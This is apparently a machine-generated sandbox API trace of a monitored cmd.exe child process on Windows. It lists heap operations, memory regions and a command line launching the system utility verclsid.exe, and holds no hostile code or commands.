[0380.753] HeapFree (in: hHeap=0x80000, dwFlags=0x0, lpMem=0x95ab0 | out: hHeap=0x80000) returned 1
[0380.753] GetProcessHeap () returned 0x80000
[0380.753] GetProcessHeap () returned 0x80000
[0380.753] HeapValidate (hHeap=0x80000, dwFlags=0x0, lpMem=0x95ae0) returned 1
[0380.753] GetProcessHeap () returned 0x80000
[0380.753] RtlSizeHeap (HeapHandle=0x80000, Flags=0x0, MemoryPointer=0x95ae0) returned 0x20
[0380.754] HeapFree (in: hHeap=0x80000, dwFlags=0x0, lpMem=0x95ae0 | out: hHeap=0x80000) returned 1
[0380.754] GetProcessHeap () returned 0x80000
[0380.754] GetProcessHeap () returned 0x80000
[0380.754] HeapValidate (hHeap=0x80000, dwFlags=0x0, lpMem=0x95b10) returned 1
[0380.754] GetProcessHeap () returned 0x80000
[0380.754] RtlSizeHeap (HeapHandle=0x80000, Flags=0x0, MemoryPointer=0x95b10) returned 0x20
[0380.754] HeapFree (in: hHeap=0x80000, dwFlags=0x0, lpMem=0x95b10 | out: hHeap=0x80000) returned 1
[0380.754] GetProcessHeap () returned 0x80000
[0380.755] GetProcessHeap () returned 0x80000
[0380.755] HeapValidate (hHeap=0x80000, dwFlags=0x0, lpMem=0x95b40) returned 1
[0380.755] GetProcessHeap () returned 0x80000
[0380.755] RtlSizeHeap (HeapHandle=0x80000, Flags=0x0, MemoryPointer=0x95b40) returned 0x20
[0380.755] HeapFree (in: hHeap=0x80000, dwFlags=0x0, lpMem=0x95b40 | out: hHeap=0x80000) returned 1
[0380.755] GetProcessHeap () returned 0x80000
[0380.755] GetProcessHeap () returned 0x80000
[0380.755] HeapValidate (hHeap=0x80000, dwFlags=0x0, lpMem=0x9bac0) returned 1
[0380.755] GetProcessHeap () returned 0x80000
[0380.755] RtlSizeHeap (HeapHandle=0x80000, Flags=0x0, MemoryPointer=0x9bac0) returned 0x18
[0380.756] HeapFree (in: hHeap=0x80000, dwFlags=0x0, lpMem=0x9bac0 | out: hHeap=0x80000) returned 1
[0380.756] GetProcessHeap () returned 0x80000
[0380.756] GetProcessHeap () returned 0x80000
[0380.756] HeapValidate (hHeap=0x80000, dwFlags=0x0, lpMem=0x95b70) returned 1
[0380.756] GetProcessHeap () returned 0x80000
[0380.756] RtlSizeHeap (HeapHandle=0x80000, Flags=0x0, MemoryPointer=0x95b70) returned 0x20
[0380.756] HeapFree (in: hHeap=0x80000, dwFlags=0x0, lpMem=0x95b70 | out: hHeap=0x80000) returned 1
[0380.756] GetProcessHeap () returned 0x80000
[0380.756] GetProcessHeap () returned 0x80000
[0380.756] HeapValidate (hHeap=0x80000, dwFlags=0x0, lpMem=0x95c00) returned 1
[0380.756] GetProcessHeap () returned 0x80000
[0380.756] RtlSizeHeap (HeapHandle=0x80000, Flags=0x0, MemoryPointer=0x95c00) returned 0x20
[0380.757] HeapFree (in: hHeap=0x80000, dwFlags=0x0, lpMem=0x95c00 | out: hHeap=0x80000) returned 1
[0380.757] GetProcessHeap () returned 0x80000
[0380.757] GetProcessHeap () returned 0x80000
[0380.757] HeapValidate (hHeap=0x80000, dwFlags=0x0, lpMem=0x95c60) returned 1
[0380.757] GetProcessHeap () returned 0x80000
[0380.757] RtlSizeHeap (HeapHandle=0x80000, Flags=0x0, MemoryPointer=0x95c60) returned 0x20
[0380.757] HeapFree (in: hHeap=0x80000, dwFlags=0x0, lpMem=0x95c60 | out: hHeap=0x80000) returned 1
[0380.757] GetProcessHeap () returned 0x80000
[0380.757] GetProcessHeap () returned 0x80000
[0380.757] HeapValidate (hHeap=0x80000, dwFlags=0x0, lpMem=0x95cc0) returned 1
[0380.758] GetProcessHeap () returned 0x80000
[0380.758] RtlSizeHeap (HeapHandle=0x80000, Flags=0x0, MemoryPointer=0x95cc0) returned 0x20
[0380.758] HeapFree (in: hHeap=0x80000, dwFlags=0x0, lpMem=0x95cc0 | out: hHeap=0x80000) returned 1
[0380.758] GetProcessHeap () returned 0x80000
[0380.758] GetProcessHeap () returned 0x80000
[0380.758] HeapValidate (hHeap=0x80000, dwFlags=0x0, lpMem=0x95cf0) returned 1
[0380.758] GetProcessHeap () returned 0x80000
[0380.758] RtlSizeHeap (HeapHandle=0x80000, Flags=0x0, MemoryPointer=0x95cf0) returned 0x20
[0380.759] HeapFree (in: hHeap=0x80000, dwFlags=0x0, lpMem=0x95cf0 | out: hHeap=0x80000) returned 1
[0380.759] GetProcessHeap () returned 0x80000
[0380.759] GetProcessHeap () returned 0x80000
[0380.759] HeapValidate (hHeap=0x80000, dwFlags=0x0, lpMem=0x9cb80) returned 1
[0380.759] GetProcessHeap () returned 0x80000
[0380.759] RtlSizeHeap (HeapHandle=0x80000, Flags=0x0, MemoryPointer=0x9cb80) returned 0x20
[0380.759] HeapFree (in: hHeap=0x80000, dwFlags=0x0, lpMem=0x9cb80 | out: hHeap=0x80000) returned 1
[0380.759] GetProcessHeap () returned 0x80000
[0380.759] GetProcessHeap () returned 0x80000
[0380.759] HeapValidate (hHeap=0x80000, dwFlags=0x0, lpMem=0x9cbb0) returned 1
[0380.759] GetProcessHeap () returned 0x80000
[0380.759] RtlSizeHeap (HeapHandle=0x80000, Flags=0x0, MemoryPointer=0x9cbb0) returned 0x20
[0380.760] HeapFree (in: hHeap=0x80000, dwFlags=0x0, lpMem=0x9cbb0 | out: hHeap=0x80000) returned 1
[0380.760] GetProcessHeap () returned 0x80000
[0380.760] GetProcessHeap () returned 0x80000
[0380.760] HeapValidate (hHeap=0x80000, dwFlags=0x0, lpMem=0x9cbe0) returned 1
[0380.760] GetProcessHeap () returned 0x80000
[0380.760] RtlSizeHeap (HeapHandle=0x80000, Flags=0x0, MemoryPointer=0x9cbe0) returned 0x20
[0380.760] HeapFree (in: hHeap=0x80000, dwFlags=0x0, lpMem=0x9cbe0 | out: hHeap=0x80000) returned 1
[0380.760] GetProcessHeap () returned 0x80000
[0380.760] GetProcessHeap () returned 0x80000
[0380.761] HeapValidate (hHeap=0x80000, dwFlags=0x0, lpMem=0x9bae0) returned 1
[0380.761] GetProcessHeap () returned 0x80000
[0380.761] RtlSizeHeap (HeapHandle=0x80000, Flags=0x0, MemoryPointer=0x9bae0) returned 0x18
[0380.763] HeapFree (in: hHeap=0x80000, dwFlags=0x0, lpMem=0x9bae0 | out: hHeap=0x80000) returned 1
[0380.763] GetProcessHeap () returned 0x80000
[0380.763] GetProcessHeap () returned 0x80000
[0380.763] HeapValidate (hHeap=0x80000, dwFlags=0x0, lpMem=0x95c30) returned 1
[0380.763] GetProcessHeap () returned 0x80000
[0380.763] RtlSizeHeap (HeapHandle=0x80000, Flags=0x0, MemoryPointer=0x95c30) returned 0x20
[0380.763] HeapFree (in: hHeap=0x80000, dwFlags=0x0, lpMem=0x95c30 | out: hHeap=0x80000) returned 1
[0380.763] GetProcessHeap () returned 0x80000
[0380.763] GetProcessHeap () returned 0x80000
[0380.763] HeapValidate (hHeap=0x80000, dwFlags=0x0, lpMem=0x9ba60) returned 1
[0380.764] GetProcessHeap () returned 0x80000
[0380.764] RtlSizeHeap (HeapHandle=0x80000, Flags=0x0, MemoryPointer=0x9ba60) returned 0x18
[0380.764] HeapFree (in: hHeap=0x80000, dwFlags=0x0, lpMem=0x9ba60 | out: hHeap=0x80000) returned 1
[0380.764] exit (_Code=0)
Thread:
id = 106
os_tid = 0xd14
Process:
id = "16"
image_name = "cmd.exe"
filename = "c:\\windows\\system32\\cmd.exe"
page_root = "0x75017000"
os_pid = "0x194"
os_integrity_level = "0x2000"
os_privileges = "0x800000"
monitor_reason = "child_process"
parent_id = "14"
os_parent_pid = "0xd08"
cmd_line = "\"C:\\Windows\\System32\\cmd.exe\" /c start \"\" verclsid.exe /M /S /C {A78ED123-AB77-406B-9999-2A5D9D2F7FB7} & Exit"
cur_dir = "C:\\Windows\\system32\\"
os_username = "Q9IATRKPRH\\kEecfMwgj"
bitness = "32"
os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f0ba" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]
Region:
id = 2215
start_va = 0x10000
end_va = 0x2ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000010000"
filename = ""
Region:
id = 2216
start_va = 0x30000
end_va = 0x33fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000030000"
filename = ""
Region:
id = 2217
start_va = 0x40000
end_va = 0x40fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000040000"
filename = ""
Region:
id = 2218
start_va = 0x150000
end_va = 0x24ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000150000"
filename = ""
Region:
id = 2219
start_va = 0x4aa90000
end_va = 0x4aae8fff
monitored = 1
entry_point = 0x4aa990b4
region_type = mapped_file
name = "cmd.exe"
filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")
Region:
id = 2220
start_va = 0x77880000
end_va = 0x77a28fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")
Region:
id = 2221
start_va = 0x7efe0000
end_va = 0x7ffdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007efe0000"
filename = ""
Region:
id = 2222
start_va = 0x7ffe0000
end_va = 0x7ffeffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007ffe0000"
filename = ""
Region:
id = 2223
start_va = 0x7feffba0000
end_va = 0x7feffba0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "apisetschema.dll"
filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll")
Region:
id = 2224
start_va = 0x7fffffb0000
end_va = 0x7fffffd2fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000007fffffb0000"
filename = ""
Region:
id = 2225
start_va = 0x7fffffd3000
end_va = 0x7fffffd3fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffd3000"
filename = ""
Region:
id = 2226
start_va = 0x7fffffde000
end_va = 0x7fffffdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffde000"
filename = ""
Region:
id = 2227
start_va = 0x250000
end_va = 0x3effff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000250000"
filename = ""
Region:
id = 2228
start_va = 0x77660000
end_va = 0x7777efff
monitored = 0
entry_point = 0x77675340
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")
Region:
id = 2229
start_va = 0x7fefd920000
end_va = 0x7fefd98bfff
monitored = 0
entry_point = 0x7fefd922780
region_type = mapped_file
name = "kernelbase.dll"
filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")
Region:
id = 2230
start_va = 0x10000
end_va = 0x1ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000010000"
filename = ""
Region:
id = 2231
start_va = 0x7efe0000
end_va = 0x7f0dffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007efe0000"
filename = ""
Region:
id = 2232
start_va = 0x7f0e0000
end_va = 0x7ffdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007f0e0000"
filename = ""
Region:
id = 2233
start_va = 0x20000
end_va = 0x2ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000020000"
filename = ""
Region:
id = 2234
start_va = 0x50000
end_va = 0xb6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "locale.nls"
filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")
Region:
id = 2235
start_va = 0x7feff7d0000
end_va = 0x7feff86efff
monitored = 0
entry_point = 0x7feff7d25a0
region_type = mapped_file
name = "msvcrt.dll"
filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")
Region:
id = 2236
start_va = 0x7fefb8b0000
end_va = 0x7fefb8b7fff
monitored = 0
entry_point = 0x7fefb8b11a0
region_type = mapped_file
name = "winbrand.dll"
filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll")
Region:
id = 2237
start_va = 0x77780000
end_va = 0x77879fff
monitored = 0
entry_point = 0x7779a2c8
region_type = mapped_file
name = "user32.dll"
filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")
Region:
id = 2238
start_va = 0x7feff980000
end_va = 0x7feff9e6fff
monitored = 0
entry_point = 0x7feff98b03c
region_type = mapped_file
name = "gdi32.dll"
filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")
Region:
id = 2239
start_va = 0x7fefef80000
end_va = 0x7fefef8dfff
monitored = 0
entry_point = 0x7fefef81080
region_type = mapped_file
name = "lpk.dll"
filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll")
Region:
id = 2240
start_va = 0x7fefe120000
end_va = 0x7fefe1e8fff
monitored = 0
entry_point = 0x7fefe19a874
region_type = mapped_file
name = "usp10.dll"
filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll")
Region:
id = 2241
start_va = 0x3f0000
end_va = 0x4cffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000003f0000"
filename = ""
Region:
id = 2242
start_va = 0x4d0000
end_va = 0x5cffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000004d0000"
filename = ""
Region:
id = 2243
start_va = 0xc0000
end_va = 0xe8fff
monitored = 0
entry_point = 0xc1010
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 2244
start_va = 0x5d0000
end_va = 0x757fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000005d0000"
filename = ""
Region:
id = 2245
start_va = 0xc0000
end_va = 0xe8fff
monitored = 0
entry_point = 0xc1010
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 2246
start_va = 0x7feff950000
end_va = 0x7feff97dfff
monitored = 0
entry_point = 0x7feff951010
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 2247
start_va = 0x7feff3d0000
end_va = 0x7feff4d8fff
monitored = 0
entry_point = 0x7feff3d1064
region_type = mapped_file
name = "msctf.dll"
filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll")
Region:
id = 2248
start_va = 0x760000
end_va = 0x8e0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000760000"
filename = ""
Region:
id = 2249
start_va = 0x8f0000
end_va = 0x1ceffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000008f0000"
filename = ""
Region:
id = 2250
start_va = 0xc0000
end_va = 0xdffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "cmd.exe.mui"
filename = "\\Windows\\System32\\en-US\\cmd.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\cmd.exe.mui")
Region:
id = 2251
start_va = 0xe0000
end_va = 0xe0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000000e0000"
filename = ""
Region:
id = 2252
start_va = 0xf0000
end_va = 0xf0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000000f0000"
filename = ""
Thread:
id = 110
os_tid = 0x81c
[0382.432] GetProcAddress (hModule=0x77660000, lpProcName="SetConsoleInputExeNameW") returned 0x77670c80
[0382.433] GetProcessHeap () returned 0x2f0000
[0382.433] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x4012) returned 0x30c610
[0382.433] GetProcessHeap () returned 0x2f0000
[0382.434] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x30c610 | out: hHeap=0x2f0000) returned 1
[0382.435] _wcsicmp (_String1="start", _String2=")") returned 74
[0382.435] _wcsicmp (_String1="FOR", _String2="start") returned -13
[0382.435] _wcsicmp (_String1="FOR/?", _String2="start") returned -13
[0382.435] _wcsicmp (_String1="IF", _String2="start") returned -10
[0382.435] _wcsicmp (_String1="IF/?", _String2="start") returned -10
[0382.435] _wcsicmp (_String1="REM", _String2="start") returned -1
[0382.435] _wcsicmp (_String1="REM/?", _String2="start") returned -1
[0382.435] GetProcessHeap () returned 0x2f0000
[0382.435] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0xb0) returned 0x309e40
[0382.435] GetProcessHeap () returned 0x2f0000
[0382.436] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x1c) returned 0x304740
[0382.442] GetProcessHeap () returned 0x2f0000
[0382.442] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x94) returned 0x309f00
[0382.444] GetProcessHeap () returned 0x2f0000
[0382.444] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0xb0) returned 0x309fa0
[0382.445] _wcsicmp (_String1="Exit", _String2=")") returned 60
[0382.445] _wcsicmp (_String1="FOR", _String2="Exit") returned 1
[0382.445] _wcsicmp (_String1="FOR/?", _String2="Exit") returned 1
[0382.445] _wcsicmp (_String1="IF", _String2="Exit") returned 4
[0382.445] _wcsicmp (_String1="IF/?", _String2="Exit") returned 4
[0382.445] _wcsicmp (_String1="REM", _String2="Exit") returned 13
[0382.445] _wcsicmp (_String1="REM/?", _String2="Exit") returned 13
[0382.445] GetProcessHeap () returned 0x2f0000
[0382.445] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0xb0) returned 0x30a060
[0382.445] GetProcessHeap () returned 0x2f0000
[0382.446] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x1a) returned 0x304770
[0382.450] GetConsoleTitleW (in: lpConsoleTitle=0x24f670, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b
[0382.451] _wcsicmp (_String1="start", _String2="DIR") returned 15
[0382.451] _wcsicmp (_String1="start", _String2="ERASE") returned 14
[0382.452] _wcsicmp (_String1="start", _String2="DEL") returned 15
[0382.452] _wcsicmp (_String1="start", _String2="TYPE") returned -1
[0382.452] _wcsicmp (_String1="start", _String2="COPY") returned 16
[0382.452] _wcsicmp (_String1="start", _String2="CD") returned 16
[0382.452] _wcsicmp (_String1="start", _String2="CHDIR") returned 16
[0382.452] _wcsicmp (_String1="start", _String2="RENAME") returned 1
[0382.452] _wcsicmp (_String1="start", _String2="REN") returned 1
[0382.452] _wcsicmp (_String1="start", _String2="ECHO") returned 14
[0382.452] _wcsicmp (_String1="start", _String2="SET") returned 15
[0382.452] _wcsicmp (_String1="start", _String2="PAUSE") returned 3
[0382.452] _wcsicmp (_String1="start", _String2="DATE") returned 15
[0382.452] _wcsicmp (_String1="start", _String2="TIME") returned -1
[0382.452] _wcsicmp (_String1="start", _String2="PROMPT") returned 3
[0382.452] _wcsicmp (_String1="start", _String2="MD") returned 6
[0382.452] _wcsicmp (_String1="start", _String2="MKDIR") returned 6
[0382.452] _wcsicmp (_String1="start", _String2="RD") returned 1
[0382.453] _wcsicmp (_String1="start", _String2="RMDIR") returned 1
[0382.453] _wcsicmp (_String1="start", _String2="PATH") returned 3
[0382.453] _wcsicmp (_String1="start", _String2="GOTO") returned 12
[0382.453] _wcsicmp (_String1="start", _String2="SHIFT") returned 12
[0382.453] _wcsicmp (_String1="start", _String2="CLS") returned 16
[0382.453] _wcsicmp (_String1="start", _String2="CALL") returned 16
[0382.453] _wcsicmp (_String1="start", _String2="VERIFY") returned -3
[0382.453] _wcsicmp (_String1="start", _String2="VER") returned -3
[0382.453] _wcsicmp (_String1="start", _String2="VOL") returned -3
[0382.453] _wcsicmp (_String1="start", _String2="EXIT") returned 14
[0382.453] _wcsicmp (_String1="start", _String2="SETLOCAL") returned 15
[0382.453] _wcsicmp (_String1="start", _String2="ENDLOCAL") returned 14
[0382.453] _wcsicmp (_String1="start", _String2="TITLE") returned -1
[0382.453] _wcsicmp (_String1="start", _String2="START") returned 0
[0382.454] GetProcessHeap () returned 0x2f0000
[0382.454] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x118) returned 0x30a120
[0382.466] GetProcessHeap () returned 0x2f0000
[0382.466] RtlReAllocateHeap (Heap=0x2f0000, Flags=0x0, Ptr=0x30a120, Size=0x98) returned 0x30a120
[0382.466] GetProcessHeap () returned 0x2f0000
[0382.466] RtlSizeHeap (HeapHandle=0x2f0000, Flags=0x0, MemoryPointer=0x30a120) returned 0x98
[0382.468] GetProcessHeap () returned 0x2f0000
[0382.468] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0xa0) returned 0x30a1d0
[0382.469] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3
[0382.469] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7
[0382.469] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb
[0382.471] _wcsicmp (_String1="verclsid.exe", _String2="DIR") returned 18
[0382.471] _wcsicmp (_String1="verclsid.exe", _String2="ERASE") returned 17
[0382.471] _wcsicmp (_String1="verclsid.exe", _String2="DEL") returned 18
[0382.471] _wcsicmp (_String1="verclsid.exe", _String2="TYPE") returned 2
[0382.472] _wcsicmp (_String1="verclsid.exe", _String2="COPY") returned 19
[0382.472] _wcsicmp (_String1="verclsid.exe", _String2="CD") returned 19
[0382.472] _wcsicmp (_String1="verclsid.exe", _String2="CHDIR") returned 19
[0382.472] _wcsicmp (_String1="verclsid.exe", _String2="RENAME") returned 4
[0382.472] _wcsicmp (_String1="verclsid.exe", _String2="REN") returned 4
[0382.472] _wcsicmp (_String1="verclsid.exe", _String2="ECHO") returned 17
[0382.472] _wcsicmp (_String1="verclsid.exe", _String2="SET") returned 3
[0382.472] _wcsicmp (_String1="verclsid.exe", _String2="PAUSE") returned 6
[0382.472] _wcsicmp (_String1="verclsid.exe", _String2="DATE") returned 18
[0382.472] _wcsicmp (_String1="verclsid.exe", _String2="TIME") returned 2
[0382.472] _wcsicmp (_String1="verclsid.exe", _String2="PROMPT") returned 6
[0382.472] _wcsicmp (_String1="verclsid.exe", _String2="MD") returned 9
[0382.472] _wcsicmp (_String1="verclsid.exe", _String2="MKDIR") returned 9
[0382.472] _wcsicmp (_String1="verclsid.exe", _String2="RD") returned 4
[0382.472] _wcsicmp (_String1="verclsid.exe", _String2="RMDIR") returned 4
[0382.473] _wcsicmp (_String1="verclsid.exe", _String2="PATH") returned 6
[0382.473] _wcsicmp (_String1="verclsid.exe", _String2="GOTO") returned 15
[0382.473] _wcsicmp (_String1="verclsid.exe", _String2="SHIFT") returned 3
[0382.473] _wcsicmp (_String1="verclsid.exe", _String2="CLS") returned 19
[0382.473] _wcsicmp (_String1="verclsid.exe", _String2="CALL") returned 19
[0382.473] _wcsicmp (_String1="verclsid.exe", _String2="VERIFY") returned -6
[0382.473] _wcsicmp (_String1="verclsid.exe", _String2="VER") returned 99
[0382.473] _wcsicmp (_String1="verclsid.exe", _String2="VOL") returned -10
[0382.473] _wcsicmp (_String1="verclsid.exe", _String2="EXIT") returned 17
[0382.473] _wcsicmp (_String1="verclsid.exe", _String2="SETLOCAL") returned 3
[0382.473] _wcsicmp (_String1="verclsid.exe", _String2="ENDLOCAL") returned 17
[0382.473] _wcsicmp (_String1="verclsid.exe", _String2="TITLE") returned 2
[0382.473] _wcsicmp (_String1="verclsid.exe", _String2="START") returned 3
[0382.473] _wcsicmp (_String1="verclsid.exe", _String2="DPATH") returned 18
[0382.474] _wcsicmp (_String1="verclsid.exe", _String2="KEYS") returned 11
[0382.474] _wcsicmp (_String1="verclsid.exe", _String2="MOVE") returned 9
[0382.474] _wcsicmp (_String1="verclsid.exe", _String2="PUSHD") returned 6
[0382.474] _wcsicmp (_String1="verclsid.exe", _String2="POPD") returned 6
[0382.474] _wcsicmp (_String1="verclsid.exe", _String2="ASSOC") returned 21
[0382.474] _wcsicmp (_String1="verclsid.exe", _String2="FTYPE") returned 16
[0382.474] _wcsicmp (_String1="verclsid.exe", _String2="BREAK") returned 20
[0382.474] _wcsicmp (_String1="verclsid.exe", _String2="COLOR") returned 19
[0382.474] _wcsicmp (_String1="verclsid.exe", _String2="MKLINK") returned 9
[0382.474] _wcsicmp (_String1="verclsid.exe", _String2="FOR") returned 16
[0382.474] _wcsicmp (_String1="verclsid.exe", _String2="IF") returned 13
[0382.474] _wcsicmp (_String1="verclsid.exe", _String2="REM") returned 4
[0382.475] _wcsnicmp (_String1="verc", _String2="cmd ", _MaxCount=0x4) returned 19
[0382.476] GetProcessHeap () returned 0x2f0000
[0382.476] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x420) returned 0x2f1320
[0382.476] SetErrorMode (uMode=0x0) returned 0x0
[0382.476] SetErrorMode (uMode=0x1) returned 0x0
[0382.476] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x2f1330, lpFilePart=0x232a60 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x232a60*="system32") returned 0x13
[0382.476] SetErrorMode (uMode=0x0) returned 0x1
[0382.476] GetProcessHeap () returned 0x2f0000
[0382.476] RtlReAllocateHeap (Heap=0x2f0000, Flags=0x0, Ptr=0x2f1320, Size=0x52) returned 0x2f1320
[0382.477] GetProcessHeap () returned 0x2f0000
[0382.477] RtlSizeHeap (HeapHandle=0x2f0000, Flags=0x0, MemoryPointer=0x2f1320) returned 0x52
[0382.477] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4aabf360, nSize=0x2000 | out: lpBuffer="") returned 0xc8
[0382.477] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1
[0382.478] GetProcessHeap () returned 0x2f0000
[0382.478] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x1ce) returned 0x2f1390
[0382.478] GetProcessHeap () returned 0x2f0000
[0382.478] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x38c) returned 0x2f1570
[0382.483] GetProcessHeap () returned 0x2f0000
[0382.483] RtlReAllocateHeap (Heap=0x2f0000, Flags=0x0, Ptr=0x2f1570, Size=0x1d0) returned 0x2f1570
[0382.483] GetProcessHeap () returned 0x2f0000
[0382.483] RtlSizeHeap (HeapHandle=0x2f0000, Flags=0x0, MemoryPointer=0x2f1570) returned 0x1d0
[0382.483] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4aabf360, nSize=0x2000 | out: lpBuffer="") returned 0x35
[0382.483] GetProcessHeap () returned 0x2f0000
[0382.483] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0xe8) returned 0x30a280
[0382.483] GetProcessHeap () returned 0x2f0000
[0382.483] RtlReAllocateHeap (Heap=0x2f0000, Flags=0x0, Ptr=0x30a280, Size=0x7e) returned 0x30a280
[0382.483] GetProcessHeap () returned 0x2f0000
[0382.483] RtlSizeHeap (HeapHandle=0x2f0000, Flags=0x0, MemoryPointer=0x30a280) returned 0x7e
[0382.484] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
[0382.484] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\verclsid.exe" (normalized: "c:\\windows\\system32\\verclsid.exe"), fInfoLevelId=0x1, lpFindFileData=0x2327d0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2327d0) returned 0x308600
[0382.484] GetProcessHeap () returned 0x2f0000
[0382.484] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x0, Size=0x28) returned 0x3047a0
[0382.484] FindClose (in: hFindFile=0x308600 | out: hFindFile=0x308600) returned 1
[0382.485] _wcsicmp (_String1=".exe", _String2=".CMD") returned 2
[0382.485] _wcsicmp (_String1=".exe", _String2=".BAT") returned 3
[0382.485] GetStartupInfoW (in: lpStartupInfo=0x232ea0 | out: lpStartupInfo=0x232ea0*(cb=0x68, lpReserved="", lpDesktop="winsta0\\default", lpTitle="C:\\Windows\\System32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0))
[0382.485] InitializeProcThreadAttributeList (in: lpAttributeList=0x0, dwAttributeCount=0x2, dwFlags=0x0, lpSize=0x232d78 | out: lpAttributeList=0x0, lpSize=0x232d78) returned 0
[0382.485] GetLastError () returned 0x7a
[0382.485] GetProcessHeap () returned 0x2f0000
[0382.485] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x48) returned 0x308600
